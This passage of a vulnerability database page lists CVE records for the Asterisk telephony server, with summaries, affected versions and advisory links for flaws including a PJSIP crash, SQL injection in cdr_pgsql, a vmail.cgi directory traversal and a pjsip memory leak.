          "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-31878",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2021/Jul/48"
            },
            {
              "name": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2021-007.html",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29381",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
            },
            {
              "name": "https://downloads.digium.com/pub/security/AST-2021-007.html",
              "refsource": "MISC",
              "url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-31878",
    "datePublished": "2021-07-27T05:17:05",
    "dateReserved": "2021-04-29T00:00:00",
    "dateUpdated": "2024-08-03T23:10:30.837Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-12227

Vulnerability from cvelistv5

Published

2018-06-12 04:00

Modified

2024-08-05 08:30

Severity ?

Summary

An issue was discovered in Asterisk Open Source 13.x before 13.21.1, 14.x before 14.7.7, and 15.x before 15.4.1 and Certified Asterisk 13.18-cert before 13.18-cert4 and 13.21-cert before 13.21-cert2. When endpoint specific ACL rules block a SIP request, they respond with a 403 forbidden. However, if an endpoint is not identified, then a 401 unauthorized response is sent. This vulnerability just discloses which requests hit a defined endpoint. The ACL rules cannot be bypassed to gain access to the disclosed endpoints.

References

▼	URL	Tags
	https://www.debian.org/security/2018/dsa-4320	vendor-advisory, x_refsource_DEBIAN
	https://issues.asterisk.org/jira/browse/ASTERISK-27818	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2018-008.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/104455	vdb-entry, x_refsource_BID
	https://security.gentoo.org/glsa/201811-11	vendor-advisory, x_refsource_GENTOO

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T08:30:59.565Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "DSA-4320",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2018/dsa-4320"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27818"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2018-008.html"
          },
          {
            "name": "104455",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/104455"
          },
          {
            "name": "GLSA-201811-11",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/201811-11"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-06-11T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk Open Source 13.x before 13.21.1, 14.x before 14.7.7, and 15.x before 15.4.1 and Certified Asterisk 13.18-cert before 13.18-cert4 and 13.21-cert before 13.21-cert2. When endpoint specific ACL rules block a SIP request, they respond with a 403 forbidden. However, if an endpoint is not identified, then a 401 unauthorized response is sent. This vulnerability just discloses which requests hit a defined endpoint. The ACL rules cannot be bypassed to gain access to the disclosed endpoints."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-11-25T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "DSA-4320",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2018/dsa-4320"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27818"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2018-008.html"
        },
        {
          "name": "104455",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/104455"
        },
        {
          "name": "GLSA-201811-11",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "https://security.gentoo.org/glsa/201811-11"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-12227",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Asterisk Open Source 13.x before 13.21.1, 14.x before 14.7.7, and 15.x before 15.4.1 and Certified Asterisk 13.18-cert before 13.18-cert4 and 13.21-cert before 13.21-cert2. When endpoint specific ACL rules block a SIP request, they respond with a 403 forbidden. However, if an endpoint is not identified, then a 401 unauthorized response is sent. This vulnerability just discloses which requests hit a defined endpoint. The ACL rules cannot be bypassed to gain access to the disclosed endpoints."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "DSA-4320",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2018/dsa-4320"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27818",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27818"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2018-008.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2018-008.html"
            },
            {
              "name": "104455",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/104455"
            },
            {
              "name": "GLSA-201811-11",
              "refsource": "GENTOO",
              "url": "https://security.gentoo.org/glsa/201811-11"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-12227",
    "datePublished": "2018-06-12T04:00:00",
    "dateReserved": "2018-06-11T00:00:00",
    "dateUpdated": "2024-08-05T08:30:59.565Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2007-6170

Vulnerability from cvelistv5

Published

2007-11-30 01:00

Modified

2024-08-07 15:54

Severity ?

Summary

SQL injection vulnerability in the Call Detail Record Postgres logging engine (cdr_pgsql) in Asterisk 1.4.x before 1.4.15, 1.2.x before 1.2.25, B.x before B.2.3.4, and C.x before C.1.0-beta6 allows remote authenticated users to execute arbitrary SQL commands via (1) ANI and (2) DNIS arguments.

References

▼	URL	Tags
	http://secunia.com/advisories/29782	third-party-advisory, x_refsource_SECUNIA
	http://security.gentoo.org/glsa/glsa-200804-13.xml	vendor-advisory, x_refsource_GENTOO
	http://secunia.com/advisories/29242	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/27892	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/archive/1/484388/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://downloads.digium.com/pub/security/AST-2007-026.html	x_refsource_CONFIRM
	http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html	vendor-advisory, x_refsource_SUSE
	http://securitytracker.com/id?1019020	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/bid/26647	vdb-entry, x_refsource_BID
	http://www.debian.org/security/2007/dsa-1417	vendor-advisory, x_refsource_DEBIAN
	http://secunia.com/advisories/27827	third-party-advisory, x_refsource_SECUNIA
	https://exchange.xforce.ibmcloud.com/vulnerabilities/38765	vdb-entry, x_refsource_XF
	http://www.vupen.com/english/advisories/2007/4056	vdb-entry, x_refsource_VUPEN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T15:54:26.987Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "29782",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/29782"
          },
          {
            "name": "GLSA-200804-13",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-200804-13.xml"
          },
          {
            "name": "29242",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/29242"
          },
          {
            "name": "27892",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/27892"
          },
          {
            "name": "20071129 AST-2007-026 - SQL Injection issue in cdr_pgsql",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/484388/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2007-026.html"
          },
          {
            "name": "SUSE-SR:2008:005",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html"
          },
          {
            "name": "1019020",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1019020"
          },
          {
            "name": "26647",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/26647"
          },
          {
            "name": "DSA-1417",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2007/dsa-1417"
          },
          {
            "name": "27827",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/27827"
          },
          {
            "name": "asterisk-cdrpqsql-sql-injection(38765)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38765"
          },
          {
            "name": "ADV-2007-4056",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/4056"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-11-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "SQL injection vulnerability in the Call Detail Record Postgres logging engine (cdr_pgsql) in Asterisk 1.4.x before 1.4.15, 1.2.x before 1.2.25, B.x before B.2.3.4, and C.x before C.1.0-beta6 allows remote authenticated users to execute arbitrary SQL commands via (1) ANI and (2) DNIS arguments."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-15T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "29782",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/29782"
        },
        {
          "name": "GLSA-200804-13",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-200804-13.xml"
        },
        {
          "name": "29242",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/29242"
        },
        {
          "name": "27892",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/27892"
        },
        {
          "name": "20071129 AST-2007-026 - SQL Injection issue in cdr_pgsql",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/484388/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2007-026.html"
        },
        {
          "name": "SUSE-SR:2008:005",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html"
        },
        {
          "name": "1019020",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1019020"
        },
        {
          "name": "26647",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/26647"
        },
        {
          "name": "DSA-1417",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2007/dsa-1417"
        },
        {
          "name": "27827",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/27827"
        },
        {
          "name": "asterisk-cdrpqsql-sql-injection(38765)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38765"
        },
        {
          "name": "ADV-2007-4056",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/4056"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-6170",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "SQL injection vulnerability in the Call Detail Record Postgres logging engine (cdr_pgsql) in Asterisk 1.4.x before 1.4.15, 1.2.x before 1.2.25, B.x before B.2.3.4, and C.x before C.1.0-beta6 allows remote authenticated users to execute arbitrary SQL commands via (1) ANI and (2) DNIS arguments."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "29782",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/29782"
            },
            {
              "name": "GLSA-200804-13",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-200804-13.xml"
            },
            {
              "name": "29242",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/29242"
            },
            {
              "name": "27892",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/27892"
            },
            {
              "name": "20071129 AST-2007-026 - SQL Injection issue in cdr_pgsql",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/484388/100/0/threaded"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2007-026.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2007-026.html"
            },
            {
              "name": "SUSE-SR:2008:005",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html"
            },
            {
              "name": "1019020",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1019020"
            },
            {
              "name": "26647",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/26647"
            },
            {
              "name": "DSA-1417",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2007/dsa-1417"
            },
            {
              "name": "27827",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/27827"
            },
            {
              "name": "asterisk-cdrpqsql-sql-injection(38765)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38765"
            },
            {
              "name": "ADV-2007-4056",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/4056"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-6170",
    "datePublished": "2007-11-30T01:00:00",
    "dateReserved": "2007-11-29T00:00:00",
    "dateUpdated": "2024-08-07T15:54:26.987Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2005-3559

Vulnerability from cvelistv5

Published

2005-11-16 07:37

Modified

2024-08-07 23:17

Severity ?

Summary

Directory traversal vulnerability in vmail.cgi in Asterisk 1.0.9 through 1.2.0-beta1 allows remote attackers to access WAV files via a .. (dot dot) in the folder parameter.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/15336	vdb-entry, x_refsource_BID
	http://secunia.com/advisories/19872	third-party-advisory, x_refsource_SECUNIA
	https://exchange.xforce.ibmcloud.com/vulnerabilities/23002	vdb-entry, x_refsource_XF
	http://www.securityfocus.com/archive/1/415990/30/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://www.assurance.com.au/advisories/200511-asterisk.txt	x_refsource_MISC
	http://secunia.com/advisories/17459	third-party-advisory, x_refsource_SECUNIA
	http://www.vupen.com/english/advisories/2005/2346	vdb-entry, x_refsource_VUPEN
	http://www.debian.org/security/2006/dsa-1048	vendor-advisory, x_refsource_DEBIAN
	http://securitytracker.com/id?1015164	vdb-entry, x_refsource_SECTRACK
	http://osvdb.org/20577	vdb-entry, x_refsource_OSVDB

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T23:17:23.334Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "15336",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/15336"
          },
          {
            "name": "19872",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/19872"
          },
          {
            "name": "asterisk-vmail-obtain-information(23002)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/23002"
          },
          {
            "name": "20051107 Asterisk vmail.cgi vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/415990/30/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.assurance.com.au/advisories/200511-asterisk.txt"
          },
          {
            "name": "17459",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/17459"
          },
          {
            "name": "ADV-2005-2346",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2005/2346"
          },
          {
            "name": "DSA-1048",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2006/dsa-1048"
          },
          {
            "name": "1015164",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1015164"
          },
          {
            "name": "20577",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/20577"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-11-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Directory traversal vulnerability in vmail.cgi in Asterisk 1.0.9 through 1.2.0-beta1 allows remote attackers to access WAV files via a .. (dot dot) in the folder parameter."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-19T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "15336",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/15336"
        },
        {
          "name": "19872",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/19872"
        },
        {
          "name": "asterisk-vmail-obtain-information(23002)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/23002"
        },
        {
          "name": "20051107 Asterisk vmail.cgi vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/415990/30/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.assurance.com.au/advisories/200511-asterisk.txt"
        },
        {
          "name": "17459",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/17459"
        },
        {
          "name": "ADV-2005-2346",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2005/2346"
        },
        {
          "name": "DSA-1048",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2006/dsa-1048"
        },
        {
          "name": "1015164",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1015164"
        },
        {
          "name": "20577",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/20577"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-3559",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Directory traversal vulnerability in vmail.cgi in Asterisk 1.0.9 through 1.2.0-beta1 allows remote attackers to access WAV files via a .. (dot dot) in the folder parameter."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "15336",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/15336"
            },
            {
              "name": "19872",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/19872"
            },
            {
              "name": "asterisk-vmail-obtain-information(23002)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/23002"
            },
            {
              "name": "20051107 Asterisk vmail.cgi vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/415990/30/0/threaded"
            },
            {
              "name": "http://www.assurance.com.au/advisories/200511-asterisk.txt",
              "refsource": "MISC",
              "url": "http://www.assurance.com.au/advisories/200511-asterisk.txt"
            },
            {
              "name": "17459",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/17459"
            },
            {
              "name": "ADV-2005-2346",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2005/2346"
            },
            {
              "name": "DSA-1048",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2006/dsa-1048"
            },
            {
              "name": "1015164",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1015164"
            },
            {
              "name": "20577",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/20577"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-3559",
    "datePublished": "2005-11-16T07:37:00",
    "dateReserved": "2005-11-16T00:00:00",
    "dateUpdated": "2024-08-07T23:17:23.334Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-16672

Vulnerability from cvelistv5

Published

2017-11-09 00:00

Modified

2024-08-05 20:35

Severity ?

Summary

An issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. A memory leak occurs when an Asterisk pjsip session object is created and that call gets rejected before the session itself is fully established. When this happens the session object never gets destroyed. Eventually Asterisk can run out of memory and crash.

References

▼	URL	Tags
	http://downloads.digium.com/pub/security/AST-2017-011.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/101765	vdb-entry, x_refsource_BID
	https://issues.asterisk.org/jira/browse/ASTERISK-27345	x_refsource_CONFIRM
	https://security.gentoo.org/glsa/201811-11	vendor-advisory, x_refsource_GENTOO
	https://www.debian.org/security/2017/dsa-4076	vendor-advisory, x_refsource_DEBIAN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T20:35:19.786Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2017-011.html"
          },
          {
            "name": "101765",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/101765"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27345"
          },
          {
            "name": "GLSA-201811-11",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/201811-11"
          },
          {
            "name": "DSA-4076",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2017/dsa-4076"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
